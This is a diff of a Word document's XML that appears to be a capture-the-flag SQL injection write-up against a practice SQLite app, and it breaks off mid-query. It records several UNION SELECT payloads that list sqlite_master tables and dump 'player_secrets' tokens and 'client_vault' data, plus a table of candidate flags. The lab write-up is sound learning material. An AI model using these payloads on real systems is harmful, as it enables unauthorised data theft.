--- a/report.docx
+++ b/report.docx
@@ -40,6 +40,14 @@
     <w:p/>
     <w:sdt>
       <w:sdtPr>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
+          <w:color w:val="auto"/>
+          <w:kern w:val="2"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w14:ligatures w14:val="standardContextual"/>
+        </w:rPr>
         <w:id w:val="914981895"/>
         <w:docPartObj>
           <w:docPartGallery w:val="Table of Contents"/>
@@ -48,15 +56,9 @@
       </w:sdtPr>
       <w:sdtEndPr>
         <w:rPr>
-          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
           <w:b/>
           <w:bCs/>
           <w:noProof/>
-          <w:color w:val="auto"/>
-          <w:kern w:val="2"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w14:ligatures w14:val="standardContextual"/>
         </w:rPr>
       </w:sdtEndPr>
       <w:sdtContent>
@@ -176,7 +178,15 @@
     <w:p/>
     <w:p>
       <w:r>
-        <w:t>Testing basic query , got basic table and user information</w:t>
+        <w:t xml:space="preserve">Testing basic </w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:t>query ,</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> got basic table and user information</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -190,7 +200,7 @@
           <w:noProof/>
         </w:rPr>
         <w:drawing>
-          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="39909861" wp14:editId="3B3E1F9A">
+          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="39909861" wp14:editId="66CACC8E">
             <wp:extent cx="5411349" cy="3040083"/>
             <wp:effectExtent l="0" t="0" r="0" b="8255"/>
             <wp:docPr id="812995017" name="Picture 1"/>
@@ -256,7 +266,7 @@
           <w:noProof/>
         </w:rPr>
         <w:drawing>
-          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="60659F1C" wp14:editId="7F6AB211">
+          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="60659F1C" wp14:editId="19016D4C">
             <wp:extent cx="5403273" cy="3035547"/>
             <wp:effectExtent l="0" t="0" r="6985" b="0"/>
             <wp:docPr id="1998281954" name="Picture 2" descr="A screenshot of a computer&#10;&#10;AI-generated content may be incorrect."/>
@@ -318,7 +328,7 @@
           <w:noProof/>
         </w:rPr>
         <w:drawing>
-          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="555736AB" wp14:editId="26D7DA42">
+          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="555736AB" wp14:editId="6B438991">
             <wp:extent cx="5284519" cy="2968831"/>
             <wp:effectExtent l="0" t="0" r="0" b="3175"/>
             <wp:docPr id="1882154418" name="Picture 3"/>
@@ -383,7 +393,15 @@
         <w:t>%’</w:t>
       </w:r>
       <w:r>
-        <w:t xml:space="preserve"> UNION SELECT name,1,1 FROM sqlite_master WHERE type='table' --</w:t>
+        <w:t xml:space="preserve"> UNION SELECT name,1,1 FROM </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>sqlite_master</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> WHERE type='table' --</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -431,6 +449,1099 @@
                     <a:ln>
                       <a:noFill/>
                     </a:ln>
+                  </pic:spPr>
+                </pic:pic>
+              </a:graphicData>
+            </a:graphic>
+          </wp:inline>
+        </w:drawing>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t xml:space="preserve">And I found </w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:t>a ”</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>player</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:t>_secrets</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t>” table</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:lastRenderedPageBreak/>
+        <w:drawing>
+          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0B58A0B9" wp14:editId="64316A2F">
+            <wp:extent cx="5943600" cy="1235710"/>
+            <wp:effectExtent l="0" t="0" r="0" b="2540"/>
+            <wp:docPr id="146316884" name="Picture 1"/>
+            <wp:cNvGraphicFramePr>
+              <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
+            </wp:cNvGraphicFramePr>
+            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
+              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                  <pic:nvPicPr>
+                    <pic:cNvPr id="146316884" name=""/>
+                    <pic:cNvPicPr/>
+                  </pic:nvPicPr>
+                  <pic:blipFill>
+                    <a:blip r:embed="rId9"/>
+                    <a:stretch>
+                      <a:fillRect/>
+                    </a:stretch>
+                  </pic:blipFill>
+                  <pic:spPr>
+                    <a:xfrm>
+                      <a:off x="0" y="0"/>
+                      <a:ext cx="5943600" cy="1235710"/>
+                    </a:xfrm>
+                    <a:prstGeom prst="rect">
+                      <a:avLst/>
+                    </a:prstGeom>
+                  </pic:spPr>
+                </pic:pic>
+              </a:graphicData>
+            </a:graphic>
+          </wp:inline>
+        </w:drawing>
+      </w:r>
+    </w:p>
+    <w:p/>
+    <w:p>
+      <w:r>
+        <w:t>Getting data from that “</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>player_secrets</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t>” table</w:t>
+      </w:r>
+      <w:r>
+        <w:br/>
+        <w:t xml:space="preserve">query: </w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">%'UNION SELECT </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>secret_token</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve">, </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>reward_points</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve">, 0 FROM </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>player_secrets</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t>—</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:drawing>
+          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="289DBC68" wp14:editId="0227579A">
+            <wp:extent cx="5943600" cy="3341370"/>
+            <wp:effectExtent l="0" t="0" r="0" b="0"/>
+            <wp:docPr id="745429139" name="Picture 1"/>
+            <wp:cNvGraphicFramePr>
+              <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
+            </wp:cNvGraphicFramePr>
+            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
+              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                  <pic:nvPicPr>
+                    <pic:cNvPr id="745429139" name=""/>
+                    <pic:cNvPicPr/>
+                  </pic:nvPicPr>
+                  <pic:blipFill>
+                    <a:blip r:embed="rId10"/>
+                    <a:stretch>
+                      <a:fillRect/>
+                    </a:stretch>
+                  </pic:blipFill>
+                  <pic:spPr>
+                    <a:xfrm>
+                      <a:off x="0" y="0"/>
+                      <a:ext cx="5943600" cy="3341370"/>
+                    </a:xfrm>
+                    <a:prstGeom prst="rect">
+                      <a:avLst/>
+                    </a:prstGeom>
+                  </pic:spPr>
+                </pic:pic>
+              </a:graphicData>
+            </a:graphic>
+          </wp:inline>
+        </w:drawing>
+      </w:r>
+      <w:r>
+        <w:t>Found the flags now submitting and seeing which one works!</w:t>
+      </w:r>
+    </w:p>
+    <w:tbl>
+      <w:tblPr>
+        <w:tblW w:w="9037" w:type="dxa"/>
+        <w:shd w:val="clear" w:color="auto" w:fill="0F172A"/>
+        <w:tblCellMar>
+          <w:top w:w="15" w:type="dxa"/>
+          <w:left w:w="15" w:type="dxa"/>
+          <w:bottom w:w="15" w:type="dxa"/>
+          <w:right w:w="15" w:type="dxa"/>
+        </w:tblCellMar>
+        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
+      </w:tblPr>
+      <w:tblGrid>
+        <w:gridCol w:w="7197"/>
+        <w:gridCol w:w="1840"/>
+      </w:tblGrid>
+      <w:tr>
+        <w:trPr>
+          <w:trHeight w:val="763"/>
+        </w:trPr>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="7197" w:type="dxa"/>
+            <w:tcBorders>
+              <w:top w:val="single" w:sz="2" w:space="0" w:color="auto"/>
+              <w:left w:val="single" w:sz="2" w:space="0" w:color="auto"/>
+              <w:bottom w:val="single" w:sz="6" w:space="0" w:color="auto"/>
+              <w:right w:val="single" w:sz="2" w:space="0" w:color="auto"/>
+            </w:tcBorders>
+            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+            <w:vAlign w:val="center"/>
+            <w:hideMark/>
+          </w:tcPr>
+          <w:p>
+            <w:r>
+              <w:t>Flags Found</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="1840" w:type="dxa"/>
+            <w:tcBorders>
+              <w:top w:val="single" w:sz="2" w:space="0" w:color="auto"/>
+              <w:left w:val="single" w:sz="2" w:space="0" w:color="auto"/>
+              <w:bottom w:val="single" w:sz="6" w:space="0" w:color="auto"/>
+              <w:right w:val="single" w:sz="2" w:space="0" w:color="auto"/>
+            </w:tcBorders>
+            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+            <w:vAlign w:val="center"/>
+            <w:hideMark/>
+          </w:tcPr>
+          <w:p>
+            <w:r>
+              <w:t>Correct?</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+      </w:tr>
+      <w:tr>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="7197" w:type="dxa"/>
+            <w:tcBorders>
+              <w:top w:val="single" w:sz="2" w:space="0" w:color="auto"/>
+              <w:left w:val="single" w:sz="2" w:space="0" w:color="auto"/>
+              <w:bottom w:val="single" w:sz="6" w:space="0" w:color="auto"/>
+              <w:right w:val="single" w:sz="2" w:space="0" w:color="auto"/>
+            </w:tcBorders>
+            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+            <w:vAlign w:val="center"/>
+          </w:tcPr>
+          <w:p>
+            <w:r>
+              <w:t>FLAG{</w:t>
+            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:t>This_is_not_the_flag</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:t>}</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="1840" w:type="dxa"/>
+            <w:tcBorders>
+              <w:top w:val="single" w:sz="2" w:space="0" w:color="auto"/>
+              <w:left w:val="single" w:sz="2" w:space="0" w:color="auto"/>
+              <w:bottom w:val="single" w:sz="6" w:space="0" w:color="auto"/>
+              <w:right w:val="single" w:sz="2" w:space="0" w:color="auto"/>
+            </w:tcBorders>
+            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+            <w:vAlign w:val="center"/>
+          </w:tcPr>
+          <w:p>
+            <w:r>
+              <w:t>NO</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+      </w:tr>
+      <w:tr>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="7197" w:type="dxa"/>
+            <w:tcBorders>
+              <w:top w:val="single" w:sz="2" w:space="0" w:color="auto"/>
+              <w:left w:val="single" w:sz="2" w:space="0" w:color="auto"/>
+              <w:bottom w:val="single" w:sz="6" w:space="0" w:color="auto"/>
+              <w:right w:val="single" w:sz="2" w:space="0" w:color="auto"/>
+            </w:tcBorders>
+            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+            <w:vAlign w:val="center"/>
+            <w:hideMark/>
+          </w:tcPr>
+          <w:p>
+            <w:r>
+              <w:t>FLAG{Trust_me_its_false_1}</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="1840" w:type="dxa"/>
+            <w:tcBorders>
+              <w:top w:val="single" w:sz="2" w:space="0" w:color="auto"/>
+              <w:left w:val="single" w:sz="2" w:space="0" w:color="auto"/>
+              <w:bottom w:val="single" w:sz="6" w:space="0" w:color="auto"/>
+              <w:right w:val="single" w:sz="2" w:space="0" w:color="auto"/>
+            </w:tcBorders>
+            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+            <w:vAlign w:val="center"/>
+            <w:hideMark/>
+          </w:tcPr>
+          <w:p>
+            <w:r>
+              <w:t>NO</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+      </w:tr>
+      <w:tr>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="7197" w:type="dxa"/>
+            <w:tcBorders>
+              <w:top w:val="single" w:sz="2" w:space="0" w:color="auto"/>
+              <w:left w:val="single" w:sz="2" w:space="0" w:color="auto"/>
+              <w:bottom w:val="single" w:sz="6" w:space="0" w:color="auto"/>
+              <w:right w:val="single" w:sz="2" w:space="0" w:color="auto"/>
+            </w:tcBorders>
+            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+            <w:vAlign w:val="center"/>
+            <w:hideMark/>
+          </w:tcPr>
+          <w:p>
+            <w:r>
+              <w:t>FLAG{Trust_me_its_ture_1}</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="1840" w:type="dxa"/>
+            <w:tcBorders>
+              <w:top w:val="single" w:sz="2" w:space="0" w:color="auto"/>
+              <w:left w:val="single" w:sz="2" w:space="0" w:color="auto"/>
+              <w:bottom w:val="single" w:sz="6" w:space="0" w:color="auto"/>
+              <w:right w:val="single" w:sz="2" w:space="0" w:color="auto"/>
+            </w:tcBorders>
+            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+            <w:vAlign w:val="center"/>
+            <w:hideMark/>
+          </w:tcPr>
+          <w:p>
+            <w:r>
+              <w:t>NO</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+      </w:tr>
+      <w:tr>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="7197" w:type="dxa"/>
+            <w:tcBorders>
+              <w:top w:val="single" w:sz="2" w:space="0" w:color="auto"/>
+              <w:left w:val="single" w:sz="2" w:space="0" w:color="auto"/>
+              <w:bottom w:val="single" w:sz="6" w:space="0" w:color="auto"/>
+              <w:right w:val="single" w:sz="2" w:space="0" w:color="auto"/>
+            </w:tcBorders>
+            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+            <w:vAlign w:val="center"/>
+            <w:hideMark/>
+          </w:tcPr>
+          <w:p>
+            <w:r>
+              <w:t>FLAG{Trust_me_its_false_2}</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="1840" w:type="dxa"/>
+            <w:tcBorders>
+              <w:top w:val="single" w:sz="2" w:space="0" w:color="auto"/>
+              <w:left w:val="single" w:sz="2" w:space="0" w:color="auto"/>
+              <w:bottom w:val="single" w:sz="6" w:space="0" w:color="auto"/>
+              <w:right w:val="single" w:sz="2" w:space="0" w:color="auto"/>
+            </w:tcBorders>
+            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+            <w:vAlign w:val="center"/>
+            <w:hideMark/>
+          </w:tcPr>
+          <w:p>
+            <w:r>
+              <w:t>NO</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+      </w:tr>
+      <w:tr>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="7197" w:type="dxa"/>
+            <w:tcBorders>
+              <w:top w:val="single" w:sz="2" w:space="0" w:color="auto"/>
+              <w:left w:val="single" w:sz="2" w:space="0" w:color="auto"/>
+              <w:bottom w:val="single" w:sz="6" w:space="0" w:color="auto"/>
+              <w:right w:val="single" w:sz="2" w:space="0" w:color="auto"/>
+            </w:tcBorders>
+            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+            <w:vAlign w:val="center"/>
+            <w:hideMark/>
+          </w:tcPr>
+          <w:p>
+            <w:r>
+              <w:t>FLAG{</w:t>
+            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:t>Hello_world_to_SQLi</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:t>}</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="1840" w:type="dxa"/>
+            <w:tcBorders>
+              <w:top w:val="single" w:sz="2" w:space="0" w:color="auto"/>
+              <w:left w:val="single" w:sz="2" w:space="0" w:color="auto"/>
+              <w:bottom w:val="single" w:sz="6" w:space="0" w:color="auto"/>
+              <w:right w:val="single" w:sz="2" w:space="0" w:color="auto"/>
+            </w:tcBorders>
+            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+            <w:vAlign w:val="center"/>
+            <w:hideMark/>
+          </w:tcPr>
+          <w:p>
+            <w:r>
+              <w:t>999</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+      </w:tr>
+      <w:tr>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="7197" w:type="dxa"/>
+            <w:tcBorders>
+              <w:top w:val="single" w:sz="2" w:space="0" w:color="auto"/>
+              <w:left w:val="single" w:sz="2" w:space="0" w:color="auto"/>
+              <w:bottom w:val="single" w:sz="6" w:space="0" w:color="auto"/>
+              <w:right w:val="single" w:sz="2" w:space="0" w:color="auto"/>
+            </w:tcBorders>
+            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+            <w:vAlign w:val="center"/>
+            <w:hideMark/>
+          </w:tcPr>
+          <w:p>
+            <w:r>
+              <w:lastRenderedPageBreak/>
+              <w:t>FLAG{Trust_me_its_ture_2}</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="1840" w:type="dxa"/>
+            <w:tcBorders>
+              <w:top w:val="single" w:sz="2" w:space="0" w:color="auto"/>
+              <w:left w:val="single" w:sz="2" w:space="0" w:color="auto"/>
+              <w:bottom w:val="single" w:sz="6" w:space="0" w:color="auto"/>
+              <w:right w:val="single" w:sz="2" w:space="0" w:color="auto"/>
+            </w:tcBorders>
+            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+            <w:vAlign w:val="center"/>
+            <w:hideMark/>
+          </w:tcPr>
+          <w:p>
+            <w:r>
+              <w:t>YESSS</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+      </w:tr>
+    </w:tbl>
+    <w:p/>
+    <w:p>
+      <w:r>
+        <w:drawing>
+          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1323071F" wp14:editId="15C4DDCE">
+            <wp:extent cx="5943600" cy="3341370"/>
+            <wp:effectExtent l="0" t="0" r="0" b="0"/>
+            <wp:docPr id="220613495" name="Picture 1"/>
+            <wp:cNvGraphicFramePr>
+              <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
+            </wp:cNvGraphicFramePr>
+            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
+              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                  <pic:nvPicPr>
+                    <pic:cNvPr id="220613495" name=""/>
+                    <pic:cNvPicPr/>
+                  </pic:nvPicPr>
+                  <pic:blipFill>
+                    <a:blip r:embed="rId11"/>
+                    <a:stretch>
+                      <a:fillRect/>
+                    </a:stretch>
+                  </pic:blipFill>
+                  <pic:spPr>
+                    <a:xfrm>
+                      <a:off x="0" y="0"/>
+                      <a:ext cx="5943600" cy="3341370"/>
+                    </a:xfrm>
+                    <a:prstGeom prst="rect">
+                      <a:avLst/>
+                    </a:prstGeom>
+                  </pic:spPr>
+                </pic:pic>
+              </a:graphicData>
+            </a:graphic>
+          </wp:inline>
+        </w:drawing>
+      </w:r>
+    </w:p>
+    <w:p/>
+    <w:p>
+      <w:r>
+        <w:br w:type="page"/>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Heading2"/>
+      </w:pPr>
+      <w:r>
+        <w:lastRenderedPageBreak/>
+        <w:t>0</w:t>
+      </w:r>
+      <w:r>
+        <w:t>2</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">SQL Injection </w:t>
+      </w:r>
+      <w:r>
+        <w:t>–</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> Advance</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">- </w:t>
+      </w:r>
+      <w:r>
+        <w:t>Exploit a bit advanced SQL</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:t>Query</w:t>
+      </w:r>
+    </w:p>
+    <w:p/>
+    <w:p>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:t>Starting of</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> with a basic query to see what we can find</w:t>
+      </w:r>
+      <w:r>
+        <w:br/>
+      </w:r>
+      <w:r>
+        <w:t>query: %</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:drawing>
+          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="37E83EBC" wp14:editId="63BB8AEF">
+            <wp:extent cx="5197642" cy="2926450"/>
+            <wp:effectExtent l="0" t="0" r="3175" b="7620"/>
+            <wp:docPr id="1145902736" name="Picture 1"/>
+            <wp:cNvGraphicFramePr>
+              <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
+            </wp:cNvGraphicFramePr>
+            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
+              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                  <pic:nvPicPr>
+                    <pic:cNvPr id="1145902736" name=""/>
+                    <pic:cNvPicPr/>
+                  </pic:nvPicPr>
+                  <pic:blipFill>
+                    <a:blip r:embed="rId12"/>
+                    <a:stretch>
+                      <a:fillRect/>
+                    </a:stretch>
+                  </pic:blipFill>
+                  <pic:spPr>
+                    <a:xfrm>
+                      <a:off x="0" y="0"/>
+                      <a:ext cx="5200285" cy="2927938"/>
+                    </a:xfrm>
+                    <a:prstGeom prst="rect">
+                      <a:avLst/>
+                    </a:prstGeom>
+                  </pic:spPr>
+                </pic:pic>
+              </a:graphicData>
+            </a:graphic>
+          </wp:inline>
+        </w:drawing>
+      </w:r>
+    </w:p>
+    <w:p/>
+    <w:p>
+      <w:r>
+        <w:t>now further exploring the columns</w:t>
+      </w:r>
+      <w:r>
+        <w:br/>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">query: </w:t>
+      </w:r>
+      <w:r>
+        <w:t>%' UNION SELECT 'a','b',1,'c' ORDER by budget --</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:drawing>
+          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3ABC84BB" wp14:editId="51611172">
+            <wp:extent cx="5094514" cy="2864030"/>
+            <wp:effectExtent l="0" t="0" r="0" b="0"/>
+            <wp:docPr id="853721749" name="Picture 1"/>
+            <wp:cNvGraphicFramePr>
+              <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
+            </wp:cNvGraphicFramePr>
+            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
+              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                  <pic:nvPicPr>
+                    <pic:cNvPr id="853721749" name=""/>
+                    <pic:cNvPicPr/>
+                  </pic:nvPicPr>
+                  <pic:blipFill>
+                    <a:blip r:embed="rId13"/>
+                    <a:stretch>
+                      <a:fillRect/>
+                    </a:stretch>
+                  </pic:blipFill>
+                  <pic:spPr>
+                    <a:xfrm>
+                      <a:off x="0" y="0"/>
+                      <a:ext cx="5109978" cy="2872723"/>
+                    </a:xfrm>
+                    <a:prstGeom prst="rect">
+                      <a:avLst/>
+                    </a:prstGeom>
+                  </pic:spPr>
+                </pic:pic>
+              </a:graphicData>
+            </a:graphic>
+          </wp:inline>
+        </w:drawing>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:lastRenderedPageBreak/>
+        <w:t>Now getting the table names</w:t>
+      </w:r>
+      <w:r>
+        <w:br/>
+        <w:t xml:space="preserve">query:  </w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">%' UNION SELECT name, 'x', 1, 'x' FROM </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>sqlite_master</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:t>–</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>Found a table named “</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>client_vault</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:t>” ,</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> I think</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> the flag</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> might be there </w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:drawing>
+          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="72306EAB" wp14:editId="1BAC5AF7">
+            <wp:extent cx="5943600" cy="3341370"/>
+            <wp:effectExtent l="0" t="0" r="0" b="0"/>
+            <wp:docPr id="221947274" name="Picture 1"/>
+            <wp:cNvGraphicFramePr>
+              <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
+            </wp:cNvGraphicFramePr>
+            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
+              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                  <pic:nvPicPr>
+                    <pic:cNvPr id="221947274" name=""/>
+                    <pic:cNvPicPr/>
+                  </pic:nvPicPr>
+                  <pic:blipFill>
+                    <a:blip r:embed="rId14"/>
+                    <a:stretch>
+                      <a:fillRect/>
+                    </a:stretch>
+                  </pic:blipFill>
+                  <pic:spPr>
+                    <a:xfrm>
+                      <a:off x="0" y="0"/>
+                      <a:ext cx="5943600" cy="3341370"/>
+                    </a:xfrm>
+                    <a:prstGeom prst="rect">
+                      <a:avLst/>
+                    </a:prstGeom>
+                  </pic:spPr>
+                </pic:pic>
+              </a:graphicData>
+            </a:graphic>
+          </wp:inline>
+        </w:drawing>
+      </w:r>
+    </w:p>
+    <w:p/>
+    <w:p>
+      <w:r>
+        <w:t>And using the hints got this from “</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>client_vault</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve">” table by accessing the </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>encrypted_data</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> column</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t xml:space="preserve">query: </w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">%' UNION SELECT 1, </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
